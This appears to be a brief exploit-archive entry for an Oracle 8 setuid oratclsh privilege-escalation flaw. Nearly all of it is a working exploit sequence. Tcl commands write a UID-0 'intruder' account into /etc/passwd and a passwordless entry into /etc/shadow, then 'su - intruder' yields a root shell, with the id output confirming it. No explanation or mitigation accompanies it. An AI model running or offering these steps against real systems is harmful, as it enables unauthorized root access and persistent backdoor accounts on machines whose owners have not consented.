|
|
Oracle 8 oratclsh Suid Vulnerability
./oratclsh % set f [open "/etc/passwd" "a+"] % puts $f "intruder:x:0:1:intruder:/tmp/intruder:/bin/sh" % close $f % set f [open "/etc/shadow" "a+"] % puts $f "intruder::::::::" % close $f % exit $ su - intruder $ id uid=0(root) gid=1(other) |
|
Privacy Statement |